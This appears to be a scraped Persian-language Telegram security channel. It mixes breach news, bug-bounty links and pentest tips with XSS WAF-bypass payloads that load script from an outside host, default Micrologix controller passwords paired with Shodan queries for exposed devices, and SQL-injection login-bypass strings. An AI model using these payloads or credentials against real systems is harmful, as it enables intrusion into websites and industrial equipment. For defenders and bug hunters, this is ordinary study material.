امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
مجموعه ی مهم ترین مطالب دنیای تست نفوذ در هفته ی اول ماه مارس از نگاه وبسایت intigriti

https://blog.intigriti.com/2020/04/14/bug-bytes-66-abusing-slacks-turn-breaking-aws-azure-spaceraccoonsec-sqli-secrets/


#writeup
#bugbounty

@sec_nerd
telegram-osint-lib


ابزار OSINT تلگرام با قابلیت:
جستجوی کاربر در گروه ها
نمایش اعضای گروه
مانیتور کردن وضعیت آنلاین بودن کاربر
دانلود تصاویر کانال
مانیتور کردن تغییرات پروفایل کاربر
دریافت پیامهای یک کاربر خاص


https://github.com/Postuf/telegram-osint-lib


به زبان php

#telegram
#osint


@sec_nerd
امنیت اطلاعات
فازینگ دایرکتوری با سه ابزار fzf + ffuf + SecLists #web #pentest #fuzzing @sec_nerd
سناریوی تبدیل باگ LFI به RCE در یک api

۱- کشف مسیر api با استفاده از ابزار ffuf
۲- استفاده مجدد از ابزار ffuf و کشف فایل application.wadl
۳- کشف یک file inclusion با وجود دارا بودن احراز هویت در تمام اکشن ها
۴- کشف اطلاعات ادمین با استفاده از LFI و ورود و سپس کشف باگ RCE

https://twitter.com/11xuxx/status/1250154111309398017

#bugbounty
#pentest
#api


@sec_nerd
بررسی امکان بالا بردن سطح دسترسی در ویندوز و لینوکس

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite


#privesc
#linux
#windows


@sec_nerd
دیتابیس وبسایت wappalyzer هک شد!

طبق اعلام این وبسایت، در تاریخ بیست ژانویه ۲۰۲۰ هکرها موفق شدند دیتابیس این سایت را هک کرده و اطلاعات آن را به سرقت ببرند.
البته اطلاعات تجاری و پسوردها در این دیتابیس وجود نداشته است.

وب سایت wappalyzer با افزونه ی فایرفاکس خود شناخته میشود. این افزونه اطلاعات مختصری از تکنولوژی های بکار رفته در وبسایتها را به کاربر ارائه میکند.


#news
#breach
#wappalyzer


@sec_nerd
توضیحات فنی در خصوص آسیب پذیری شناسه CVE-2020-3952 که برای نفوذ به VCenter با مشکل افشای اطلاعات حساس در سرویس VMware Directory Service مورد استفاده قرار میگیرد


https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/

#vmware
#exploit


@sec_nerd
𝘾𝙡𝙤𝙪𝙙𝙛𝙡𝙖𝙧𝙚 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<img src=x onError=import('//1152848220/')>
𝘼𝙠𝙖𝙢𝙖𝙞 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click
𝙈𝙤𝙙_𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨
<x onauxclick=import('//1152848220/')>click


#BugBounty
#xss
#waf
#cf


@sec_nerd
find connected Micrologix devices.
Default password for administrator:mi1400. Guest:guest
#Shodan "Server: A-B www/0.1"
Results 514
#ZoomEye "Server: A-B www/0.1"
Results 2000+


#shodan
#pentest

@sec_nerd
پلیس FBI اعلام کرد هکرهای دولتی بدنبال نفوذ به انستیتوهای علمی فعال در زمینه مبارزه با ویروس کرونا هستند.

طبق اعلام جانشین معاون FBI فعالیت هایی رصد شده اند که نشان میدهند هکرهای دولتی به دنبال نفوذ به مراکز علمی امریکا هستند که احتمالا علاقمند به دستیابی به منابع علمی و یافته های این انستیتوها می باشند.


https://www.forbes.com/sites/daveywinder/2020/04/17/fbi-says-foreign-states-hacked-into-us-covid-19-research-centers-report/#1f93eeda3c29


#news
#usa
#coronavirus


@sec_nerd
دو نکته مربوط به جستجو در shodan:

۱- برای یافتن زیردامنه های یک شرکت با پسوندهای مختلف و نیز حذف مواردی که خطای ۴۰۱ دارند
ssl.cert.subject.cn:Starbucks.* -401


۲- برای حذف مواردی که عنوان صفحه یک عبارت خاص است
ssl.cert.subject.cn:Starbucks -title:" "



برای حذف هر نتیجه ی میتوانید از علامت - استفاده کنید


#shodan
#bubgountytips
#bugbounty


@sec_nerd
امنیت اطلاعات
حملات باج افزاری و فیشینگ علیه زیرساختهای بهداشتی و مراکز علمی افزایش پیدا کرده اند. در گزارشی که شرکت Palo Alto Networks منتشر کرد اعلام شده است که در طی شیوع ویروس کرونا مجرمان سایبری حملات باج افزاری خود را به مراکزی که با این مسئله درگیر هستند افزایش…
هکرها ماه ها پس از انتشار آسیب پذیری مربوط به Pulse Secure VPN به اطلاعات اکتیودایرکتوری برخی بیمارستانهای امریکا دست یافته و باج افزارهای خود را در شبکه به اجرا گذاشته اند.


نزدیک به یکسال از انتشار اکسپلویت مربوط به سرورهای وی پی ان pulse secure میگذرد اما هنوز هم مواردی از سرورهای پچ نشده و آسیب پذیر در نقاط حساس دیده میشود.


https://www.bleepingcomputer.com/news/security/us-govt-hacker-used-stolen-ad-credentials-to-ransom-hospitals/


#pulse
#breach
#usa
#coronavirus


@sec_nerd
یک هکر ناشناس اطلاعات ۲۰ میلیون کاربر یک فروشگاه ثالث اپلیکیشن های اندروید با نام Aptoide را منتشر کرد!

این هکر ادعا میکند دیتای ۲۰ میلیونی بخشی از دیتای ۳۹ میلیونی اصلی است.
جزییاتی مانند ایمیل،پسوردهای هش شده،نام اصلی،مشخصات دستگاه و تاریخ تولد در این دیتابیس دیده میشود.

شایان ذکر است که پسوردهای هش شده از نوع sha1 و sha256 هستند که تا دقایقی قبل نزدیک به ۵ میلیون آن کرک شده است.


#breach
#news
#aptoide


@sec_nerd
آسیب پذیری بحرانی تبدیل CSRF به RCE در فروشگاه ساز پرستاشاپ نسخه 1.7.6.4

https://stazot.com/prestashop-csrf-to-rce-article/


#prestashop
#rce
#csrf

@sec_nerd
sqli bypass

username: '--' / "--"
password: '--' / "--"


#sqli
#bugbounty


@sec_nerd